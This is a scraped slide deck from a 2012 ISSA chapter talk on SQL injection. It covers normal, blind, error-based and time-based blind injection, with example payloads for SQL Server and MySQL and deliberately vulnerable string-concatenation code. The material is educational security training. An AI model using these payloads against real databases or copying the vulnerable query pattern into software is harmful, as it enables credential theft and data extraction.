Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Time-Based Blind SQL Injection

11,111 views

Published on

This presentation was given at the November 2012 chapter meeting of the Memphis ISSA. In the presentation, I discuss various methods of exploiting common SQL Injection vulnerabilities, as well as present a specialized technique known as Time-Based Blind SQL Injection. Related to the latter, I give a scenario in which other common forms of SQL Injection would fail to produce results for a penetration tester or attacker, and show how one may overcome this situation by using the specialized technique. The scenario given, along with the sample code, is NOT a contrived example, but instead is closely based on a real-world application that I encountered as part of an assessment.

A live demonstration of the common forms of SQL Injection was also given which utilized the OWASP Broken Web Apps VM, DVWA, Burp Proxy and SQL Power Injector. To demo a real-world time-based blind injection, I created and locally hosted a new application which closely mimicked the real-world application mentioned above.

  • Be the first to comment

  • Be the first to like this

Time-Based Blind SQL Injection

  1. 1. TIME-BASED BLIND SQL INJECTIONMatt Presson (@matt_presson)Memphis ISSANovember 2012
  2. 2. WHO AM I? Sr. Information Security Analyst Focus:  Application Security  Database Security  Mobile Security
  3. 3. OBJECTIVE Quick introduction to SQL Injection Four main types of SQL Injection Time-based + Blind A likely scenario DEMOs
  4. 4. INTRO TO SQL INJECTION
  5. 5. DEFINITION“SQL injection is an attack in which malicious codeis inserted into strings that are later passed to [adatabase] for parsing and execution.”“The primary form of SQL injection consists ofdirect insertion of code into user-input variablesthat are concatenated with SQL commands andexecuted.”Source: http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx
  6. 6. SAMPLE VULNERABLE CODEvar _shipCity = Request.form("ShipCity");var sql = "select * from OrdersTable" + " where ShipCity = " + "" + _shipCity + "";Source: http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx
  7. 7. CATEGORIES OF SQL INJECTION Normal  UNION queries Blind  Boolean expressions Error-based  Valid syntax that throws exceptions Time-based  Resource intensive or sleep-style queries
  8. 8. EXAMPLES – NORMAL INJECTIONvar sql = "select ShipCity, Dest from Orders" + " where ShipCity = "+_shipCity+"";Inject: UNION <data you want to extract> -- -Example:select ShipCity, Dest from Orders whereShipCity= UNION select Username, Passwordfrom Users -- -
  9. 9. EXAMPLES – BLIND INJECTIONvar sql = "select * from Orders" + " where ShipCity = "+_shipCity+"";Inject: <valid value> and <positive expression> <valid value> and <negative expression>Example:select * from Orders where ShipCity=Memphisand 1=1
  10. 10. EXAMPLES – ERROR-BASED INJECTIONvar sql = "select * from Orders" + " where ShipCity = "+_shipCity+"";Example (SQL Server):select * from Orders where ShipCity= and1=CAST(suser_name() as INT)-- -Example (MySQL):select * from Orders where ShipCity= andExtractValue(0,CONCAT(0x5c,(select user())))-- -
  11. 11. EXAMPLES – TIME-BASED INJECTIONvar sql = "select ShipCity, Dest from Orders" + " where ShipCity = "+_shipCity+"";Example (SQL Server):select ShipCity, Dest from Orders whereShipCity= waitfor delay 0:0:10Example (MySQL >= 5.0.12):select ShipCity, Dest from Orders whereShipCity= UNION SELECT SLEEP(5), 2
  12. 12. TIME-BASED + BLINDSame:  Resource intensive or sleep/wait style functionsNew:  Extract arbitrary data  Bypass business functionality
  13. 13. EXAMPLES – TIME-BASED + BLINDvar sql = "select ShipCity, Dest from Orders" + " where ShipCity = "+_shipCity+"";Example (SQL Server):select ShipCity, Dest from Orders whereShipCity=; if(<boolean>) waitfor delay 0:0:10Example (MySQL >= 5.0.12):select ShipCity, Dest from Orders whereShipCity= UNIONSELECT IF(<bool>,SLEEP(5),1), 2
  14. 14. SCENARIO
  15. 15. DEMOS

×